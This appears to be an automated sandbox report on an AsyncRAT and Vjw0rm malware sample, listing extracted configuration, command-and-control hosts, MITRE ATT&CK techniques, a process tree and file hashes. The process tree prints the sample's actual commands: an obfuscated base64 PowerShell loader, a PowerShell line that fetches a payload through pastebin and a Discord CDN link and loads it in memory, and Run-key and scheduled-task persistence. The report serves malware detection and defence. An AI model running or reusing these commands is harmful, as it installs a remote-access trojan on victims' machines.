asyncrat | a77bf4f6f417a480f95547d6c6a332c42048d91e1768ff60afcc3ee54ff6e8c2

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10-09-2024 09:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
Size

669KB
MD5

c28b393fccf6d23f9b175b44c4288893
SHA1

7d081db02f6654c785fca5b8187e13fdde5878c6
SHA256

08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a
SHA512

e9167c23388fe417a1da2733272a40052ca5db5f1068e57bfcf0864e129e7e9a5aab43d10647e6bdc2b84eb66f7ab0f1677e268f5581931b8a147cf74330fc3b
SSDEEP

12288:SBdlwHRn+WlYV+W2X+t4DwlFpJu0nTXoJwh7mA9St4xjXLYqEWXP+YjjPGoTI:SBkVdlYAW0MlFPnEJwB9SojIFkjPGR

Score

10^/10

asyncrat vjw0rm suepr envio sep03 discovery execution persistence rat trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://pastebin.com/raw/V9y5Q5vv

Extracted

Family

asyncrat

Version

1.0.7

Botnet

SUEPR ENVIO SEP03

nyan43.duckdns.org:1963

Mutex

YHGBVFDC

Attributes

delay
15
install
false
install_file
qawsedrftyujgh.exe
install_folder
%AppData%

aes.plain

Extracted

Family

vjw0rm

http://yuya0415.duckdns.org:1928

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

Blocklisted process makes network request 26 IoCs

flow	pid	Process
8	2440	WScript.exe
17	1568	powershell.exe
18	1568	powershell.exe
20	1568	powershell.exe
22	1568	powershell.exe
25	1568	powershell.exe
29	1568	powershell.exe
32	2440	WScript.exe
39	2440	WScript.exe
42	2440	WScript.exe
56	2440	WScript.exe
57	2440	WScript.exe
59	2440	WScript.exe
60	2440	WScript.exe
63	2440	WScript.exe
65	2440	WScript.exe
67	2440	WScript.exe
68	2440	WScript.exe
74	2440	WScript.exe
76	2440	WScript.exe
78	2440	WScript.exe
79	2440	WScript.exe
80	2440	WScript.exe
82	2440	WScript.exe
83	2440	WScript.exe
84	2440	WScript.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation	DOCUMENTOS.exe

Executes dropped EXE 3 IoCs

pid	Process
2844	DOCUMENTOS.exe
3360	.......exe
3800	.......exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ZL320VW7T1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\..............js\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\______DCNIYAN_____________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2256	powershell.exe
1568	powershell.exe
1292	powershell.exe
2616	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
18	pastebin.com
19	bitbucket.org
20	bitbucket.org
16	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3360 set thread context of 3800	3360	.......exe	100

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.......exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	.......exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DOCUMENTOS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings	DOCUMENTOS.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
2256	powershell.exe
2256	powershell.exe
1568	powershell.exe
1568	powershell.exe
1292	powershell.exe
3280	powershell.exe
3280	powershell.exe
1292	powershell.exe
3280	powershell.exe
1292	powershell.exe
1292	powershell.exe
2616	powershell.exe
2616	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3360	.......exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	3800	.......exe
Token: SeDebugPrivilege	3800	.......exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 3660	2244	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe	84
PID 2244 wrote to memory of 3660	2244	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe	84
PID 2244 wrote to memory of 3660	2244	08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe	84
PID 3660 wrote to memory of 2844	3660	cmd.exe	88
PID 3660 wrote to memory of 2844	3660	cmd.exe	88
PID 3660 wrote to memory of 2844	3660	cmd.exe	88
PID 2844 wrote to memory of 2440	2844	DOCUMENTOS.exe	90
PID 2844 wrote to memory of 2440	2844	DOCUMENTOS.exe	90
PID 2844 wrote to memory of 2440	2844	DOCUMENTOS.exe	90
PID 2844 wrote to memory of 4688	2844	DOCUMENTOS.exe	91
PID 2844 wrote to memory of 4688	2844	DOCUMENTOS.exe	91
PID 2844 wrote to memory of 4688	2844	DOCUMENTOS.exe	91
PID 2844 wrote to memory of 3360	2844	DOCUMENTOS.exe	92
PID 2844 wrote to memory of 3360	2844	DOCUMENTOS.exe	92
PID 2844 wrote to memory of 3360	2844	DOCUMENTOS.exe	92
PID 4688 wrote to memory of 4988	4688	WScript.exe	93
PID 4688 wrote to memory of 4988	4688	WScript.exe	93
PID 4688 wrote to memory of 4988	4688	WScript.exe	93
PID 4688 wrote to memory of 844	4688	WScript.exe	96
PID 4688 wrote to memory of 844	4688	WScript.exe	96
PID 4688 wrote to memory of 844	4688	WScript.exe	96
PID 4688 wrote to memory of 2256	4688	WScript.exe	98
PID 4688 wrote to memory of 2256	4688	WScript.exe	98
PID 4688 wrote to memory of 2256	4688	WScript.exe	98
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 3360 wrote to memory of 3800	3360	.......exe	100
PID 2256 wrote to memory of 1568	2256	powershell.exe	101
PID 2256 wrote to memory of 1568	2256	powershell.exe	101
PID 2256 wrote to memory of 1568	2256	powershell.exe	101
PID 1568 wrote to memory of 1292	1568	powershell.exe	105
PID 1568 wrote to memory of 1292	1568	powershell.exe	105
PID 1568 wrote to memory of 1292	1568	powershell.exe	105
PID 1568 wrote to memory of 3280	1568	powershell.exe	106
PID 1568 wrote to memory of 3280	1568	powershell.exe	106
PID 1568 wrote to memory of 3280	1568	powershell.exe	106
PID 1292 wrote to memory of 2616	1292	powershell.exe	107
PID 1292 wrote to memory of 2616	1292	powershell.exe	107
PID 1292 wrote to memory of 2616	1292	powershell.exe	107

C:\Users\Admin\AppData\Local\Temp\08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe
"C:\Users\Admin\AppData\Local\Temp\08c456bc976fd183171bf7fef71d8fc37894a9e0e2c3b041b589cd864fce698a.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DOCC..bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3660
- - C:\Users\Admin\AppData\Local\Temp\DOCUMENTOS.exe
    DOCUMENTOS.exe -pA2024 -dC:\Users\Admin\AppData\Local\Temp
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2844
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\..............js"
      4⤵
      Blocklisted process makes network request
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:2440
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\..........vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4688
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4988
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:844
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $MkplqW = 'J☼Bq☼HY☼bgBl☼HU☼I☼☼9☼C☼☼Jw☼w☼DE☼Jw☼7☼CQ☼bwB6☼HM☼agBm☼C☼☼PQ☼g☼Cc☼JQBw☼Ho☼QQBj☼E8☼ZwBJ☼G4☼TQBy☼CU☼Jw☼7☼Fs☼UwB5☼HM☼d☼Bl☼G0☼LgBO☼GU☼d☼☼u☼FM☼ZQBy☼HY☼aQBj☼GU☼U☼Bv☼Gk☼bgB0☼E0☼YQBu☼GE☼ZwBl☼HI☼XQ☼6☼Do☼UwBl☼HI☼dgBl☼HI☼QwBl☼HI☼d☼Bp☼GY☼aQBj☼GE☼d☼Bl☼FY☼YQBs☼Gk☼Z☼Bh☼HQ☼aQBv☼G4☼QwBh☼Gw☼b☼Bi☼GE☼YwBr☼C☼☼PQ☼g☼Hs☼J☼B0☼HI☼dQBl☼H0☼OwBb☼FM☼eQBz☼HQ☼ZQBt☼C4☼TgBl☼HQ☼LgBT☼GU☼cgB2☼Gk☼YwBl☼F☼☼bwBp☼G4☼d☼BN☼GE☼bgBh☼Gc☼ZQBy☼F0☼Og☼6☼FM☼ZQBj☼HU☼cgBp☼HQ☼eQBQ☼HI☼bwB0☼G8☼YwBv☼Gw☼I☼☼9☼C☼☼WwBT☼Hk☼cwB0☼GU☼bQ☼u☼E4☼ZQB0☼C4☼UwBl☼GM☼dQBy☼Gk☼d☼B5☼F☼☼cgBv☼HQ☼bwBj☼G8☼b☼BU☼Hk☼c☼Bl☼F0☼Og☼6☼FQ☼b☼Bz☼DE☼Mg☼7☼Fs☼QgB5☼HQ☼ZQBb☼F0☼XQ☼g☼CQ☼dQBo☼G0☼eQB6☼C☼☼PQ☼g☼Fs☼cwB5☼HM☼d☼Bl☼G0☼LgBD☼G8☼bgB2☼GU☼cgB0☼F0☼Og☼6☼EY☼cgBv☼G0☼QgBh☼HM☼ZQ☼2☼DQ☼UwB0☼HI☼aQBu☼Gc☼K☼☼g☼Cg☼TgBl☼Hc☼LQBP☼GI☼agBl☼GM☼d☼☼g☼E4☼ZQB0☼C4☼VwBl☼GI☼QwBs☼Gk☼ZQBu☼HQ☼KQ☼u☼EQ☼bwB3☼G4☼b☼Bv☼GE☼Z☼BT☼HQ☼cgBp☼G4☼Zw☼o☼C☼☼K☼BO☼GU☼dw☼t☼E8☼YgBq☼GU☼YwB0☼C☼☼TgBl☼HQ☼LgBX☼GU☼YgBD☼Gw☼aQBl☼G4☼d☼☼p☼C4☼R☼Bv☼Hc☼bgBs☼G8☼YQBk☼FM☼d☼By☼Gk☼bgBn☼Cg☼JwBo☼HQ☼d☼Bw☼Do☼Lw☼v☼H☼☼YQBz☼HQ☼ZQBi☼Gk☼bg☼u☼GM☼bwBt☼C8☼cgBh☼Hc☼LwBW☼Dk☼eQ☼1☼FE☼NQB2☼HY☼Jw☼p☼C☼☼KQ☼g☼Ck☼OwBb☼HM☼eQBz☼HQ☼ZQBt☼C4☼QQBw☼H☼☼R☼Bv☼G0☼YQBp☼G4☼XQ☼6☼Do☼QwB1☼HI☼cgBl☼G4☼d☼BE☼G8☼bQBh☼Gk☼bg☼u☼Ew☼bwBh☼GQ☼K☼☼k☼HU☼a☼Bt☼Hk☼eg☼p☼C4☼RwBl☼HQ☼V☼B5☼H☼☼ZQ☼o☼Cc☼QwBs☼GE☼cwBz☼Ew☼aQBi☼HI☼YQBy☼Hk☼Mw☼u☼EM☼b☼Bh☼HM☼cw☼x☼Cc☼KQ☼u☼Ec☼ZQB0☼E0☼ZQB0☼Gg☼bwBk☼Cg☼JwBN☼HM☼cQBC☼Ek☼YgBZ☼Cc☼KQ☼u☼Ek☼bgB2☼G8☼awBl☼Cg☼J☼Bu☼HU☼b☼Bs☼Cw☼I☼Bb☼G8☼YgBq☼GU☼YwB0☼Fs☼XQBd☼C☼☼K☼☼n☼CY☼Nw☼5☼DU☼Nw☼3☼D☼☼NgBm☼Dg☼N☼Bm☼Dk☼M☼Bj☼Dk☼Nw☼2☼Dc☼NQ☼5☼DM☼O☼Bj☼GU☼MwBi☼GQ☼NgBj☼GE☼N☼Bj☼DY☼MwBi☼DE☼ZgBj☼DY☼Nw☼5☼DM☼Z☼Bj☼DM☼YQ☼1☼GE☼MgBi☼GI☼Mw☼x☼GM☼MwBi☼DQ☼Z☼Bh☼DY☼MQBk☼GM☼Zg☼9☼G0☼a☼☼m☼DU☼MQ☼y☼DQ☼NwBk☼DY☼Ng☼9☼HM☼aQ☼m☼DU☼OQ☼z☼Dk☼O☼Bk☼DY☼Ng☼9☼Hg☼ZQ☼/☼HQ☼e☼B0☼C4☼Mw☼0☼E4☼QQBZ☼Ek☼TgBD☼EQ☼Lw☼4☼Dg☼N☼☼1☼Dc☼MQ☼y☼Dg☼O☼☼z☼DU☼Ng☼0☼Dc☼NQ☼w☼Dg☼Mg☼x☼C8☼Mw☼1☼DE☼MQ☼z☼DE☼NQ☼4☼DE☼Mg☼3☼DY☼MQ☼5☼DE☼M☼☼4☼DI☼MQ☼v☼HM☼d☼Bu☼GU☼bQBo☼GM☼YQB0☼HQ☼YQ☼v☼G0☼bwBj☼C4☼c☼Bw☼GE☼Z☼By☼G8☼YwBz☼Gk☼Z☼☼u☼G4☼Z☼Bj☼C8☼Lw☼6☼HM☼c☼B0☼HQ☼a☼☼n☼C☼☼L☼☼g☼CQ☼bwB6☼HM☼agBm☼C☼☼L☼☼g☼Cc☼XwBf☼F8☼XwBf☼F8☼R☼BD☼E4☼SQBZ☼EE☼TgBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼F8☼XwBf☼C0☼LQ☼t☼C0☼LQ☼t☼C0☼Jw☼s☼C☼☼J☼Bq☼HY☼bgBl☼HU☼L☼☼g☼Cc☼MQ☼n☼Cw☼I☼☼n☼FI☼bwBk☼GE☼Jw☼g☼Ck☼KQ☼7☼☼==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $MkplqW.replace('☼','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\..........vbs');powershell -command $KByHL;
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2256
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jvneu = '01';$ozsjf = 'C:\Users\Admin\AppData\Local\Temp\..........vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $uhmyz = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($uhmyz).GetType('ClassLibrary3.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&7957706f84f90c97675938ce3bd6ca4c63b1fc6793dc3a5a2bb31c3b4da61dcf=mh&51247d66=si&59398d66=xe?txt.34NAYINCD/8845712883564750821/3511315812761910821/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $ozsjf , '______DCNIYAN_____________________________________-------', $jvneu, '1', 'Roda' ));"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        8⤵
        Adds Run key to start application
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\..........vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3280
  - - C:\Users\Admin\AppData\Local\Temp\.......exe
      "C:\Users\Admin\AppData\Local\Temp\.......exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3360
    - - C:\Users\Admin\AppData\Local\Temp\.......exe
        
        "C:\Users\Admin\AppData\Local\Temp\.......exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
47ad785a164d8ff087b5fc8372b82520

SHA1
f23b4ab647065004331d06eb701783f4c89a74dd

SHA256
03c404532d410575bc3c3aeb45e8c3f0156801f985eb66111aee0672e682155a

SHA512
c6e9e7d2b8148432dc274966915c6a0c801a44f1b40fa17fa88a185243087606986befe3f19ba16953aa6d6d7e57788a6a265c105d01deae7bd154313f4985a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
51b346056247927eb8c16b92c79d3214

SHA1
716d17698a33d37469f6e232a806d9a6cfa385d7

SHA256
d308a4350a62f2c003bc91fbafc4bf748f3599b3e9e888f550dca7e7a4dd1dba

SHA512
74db4b8735722f4d40ef69554b6476b459680fe008e0637da59e0fa4b2eb0f5ef5ac957816e3d50b8af6910ccaa09e06e0561cf6b237b621c9355a5f173f04b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
a5cb57b3f690f5661a7c3efada0b151a

SHA1
42d045d996e99d23082abc5f6f3afd585d6114be

SHA256
df8bdff0b7dbe8829b26598ac13227c413cc8e5ec5eafa769095a2574a633bb8

SHA512
eceaef474be5ff70835bb044d461a1278e3e1fc627c1a7f599ba0b14184ddd8d3688378fd48c6da9051e563e2d5e659552ca2089ecda5e752ccb01b2c435bb64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
ae5546b9d90069002c535de9d76b66ad

SHA1
25e7148edee8c9c5eee722ba0319c14c4b047a09

SHA256
ee8290fa8ed5e87d870ef707232f7a579427609a11b0c9f76675932d2dcab0e2

SHA512
771dd18e1f641b2f392166985818b6dea02a9490fee1e22e9b3bf988612421c590449bad39dd30bf6dc41033be57adc1b9fe7941e3751d0c1aed751abce4a19f

Download Submit
C:\Users\Admin\AppData\Local\Temp\..............js

Filesize
19KB

MD5
1e2d967510acc2d7eafe89a5e7065d22

SHA1
a4a48ef24001200fbe87192a235a1e1b93503ed9

SHA256
d65a679961d19a6b4019bf4b236358376512776779c6ef553afb1a82066ae5b5

SHA512
729d0d2216c30d7ad3dd6ee9e0853a7e61baab23f5013aa93c7c64707718eef3353c97de3dc32133a03389ffb5c42334620644520ff90ccaa7a7e1639414955d

Download Submit
C:\Users\Admin\AppData\Local\Temp\..........vbs

Filesize
11.1MB

MD5
52f3268631d8e587ca16d620fa730ca4

SHA1
9d2fd3dfc0b55a052d9b9f38e12f353e266b5283

SHA256
89e19321c824beee9a59f3099287709c97ff2741601d87575ecae823b72330fe

SHA512
cb2c2c871d17c4d86137ce986754fa99beabf7844b601abd6dcd95e8cd44cec5c9233699aa84d1ea05473de593295f6fb6256446e85e9dde7e140b0942138e99

Download Submit
C:\Users\Admin\AppData\Local\Temp\.......exe

Filesize
168KB

MD5
f1519c55864faaee2b9c5d1fe108c161

SHA1
6c52b209f54224c968c3c97697760a41687b6d94

SHA256
0061e8f7d0c9996657cf12c53bd07b3c803b209fc20dbfb085c96f6a3e34fa80

SHA512
36994b04e89b39590a5ed699bc8a66ae28db20f4fffbdf1c2e9a3123660d8d10711ef4b7cc0d3b4d80e871a3b83372a4a88b2a1546f51d835af9cf5084859cac

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCC..bat

Filesize
31B

MD5
dbc43c69d0db1281d4980239473e6878

SHA1
1e1c00319ec2d094d7b4b7f20a06fe33ef3f3505

SHA256
f6139a5b45f9d856e978740acb52bd00e38dd963006293f05b7f279f61dce123

SHA512
a814be51d049b6080a69fd3c178143cc4624d3eccb8c415813d177d377975c907383c3a08c98b815211f9af50ecf246875072ad548ebfa63341dd6a68d4925a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\DOCUMENTOS.exe

Filesize
496KB

MD5
92bc72b4a0421640775050aebb624629

SHA1
cbe83c0360e84f816e70c9a63ef82e6437b0a97b

SHA256
d33377b73ab3ab2b13508d9e4c293cc45b63bb2cb94297d39822f71e66a20d36

SHA512
3c1d6e9b0a81b288b04d614a3997236a7a5af538015cb7caa159daa409f35cccfb149a9adfd9314856e43a7f0f3237a43d16177299ff2f7d8b5c34e7659a5064

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gqb3c5bn.pou.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
286B

MD5
8a14359cd71dbdea46036319d2b68a56

SHA1
f4ee6bd57835c2039462eee3035702da4a36d794

SHA256
9924b64a99a84a6d31d8d8733ca565ceffc6adebdc3f77912f429eeaadfef1c7

SHA512
4ce48e0c07ac1164b4a41b7213ec3e1d955335eb9df40b09231e5ddd01fe79ebfb8236b67e956006d26060e86d1714912b857049ae5923d06dec9402adcaf17a

Download Submit
memory/1292-98-0x0000000007850000-0x0000000007882000-memory.dmp

Filesize
200KB

Download
memory/1292-109-0x0000000007830000-0x000000000784E000-memory.dmp

Filesize
120KB

Download
memory/1292-112-0x00000000078A0000-0x0000000007943000-memory.dmp

Filesize
652KB

Download
memory/1292-113-0x0000000007C70000-0x0000000007C7A000-memory.dmp

Filesize
40KB

Download
memory/1292-99-0x00000000751C0000-0x000000007520C000-memory.dmp

Filesize
304KB

Download
memory/1292-116-0x0000000007E00000-0x0000000007E11000-memory.dmp

Filesize
68KB

Download
memory/1568-70-0x0000000007F00000-0x000000000857A000-memory.dmp

Filesize
6.5MB

Download
memory/1568-72-0x0000000006B60000-0x0000000006B68000-memory.dmp

Filesize
32KB

Download
memory/1568-71-0x0000000006AE0000-0x0000000006AFA000-memory.dmp

Filesize
104KB

Download
memory/2256-48-0x0000000005EF0000-0x0000000005F56000-memory.dmp

Filesize
408KB

Download
memory/2256-60-0x0000000006690000-0x00000000066DC000-memory.dmp

Filesize
304KB

Download
memory/2256-59-0x0000000006510000-0x000000000652E000-memory.dmp

Filesize
120KB

Download
memory/2256-58-0x0000000005F60000-0x00000000062B4000-memory.dmp

Filesize
3.3MB

Download
memory/2256-47-0x0000000005DD0000-0x0000000005E36000-memory.dmp

Filesize
408KB

Download
memory/2256-45-0x0000000005450000-0x0000000005472000-memory.dmp

Filesize
136KB

Download
memory/2256-44-0x0000000005730000-0x0000000005D58000-memory.dmp

Filesize
6.2MB

Download
memory/2256-43-0x0000000004F80000-0x0000000004FB6000-memory.dmp

Filesize
216KB

Download
memory/3280-110-0x0000000007A20000-0x0000000007AB6000-memory.dmp

Filesize
600KB

Download
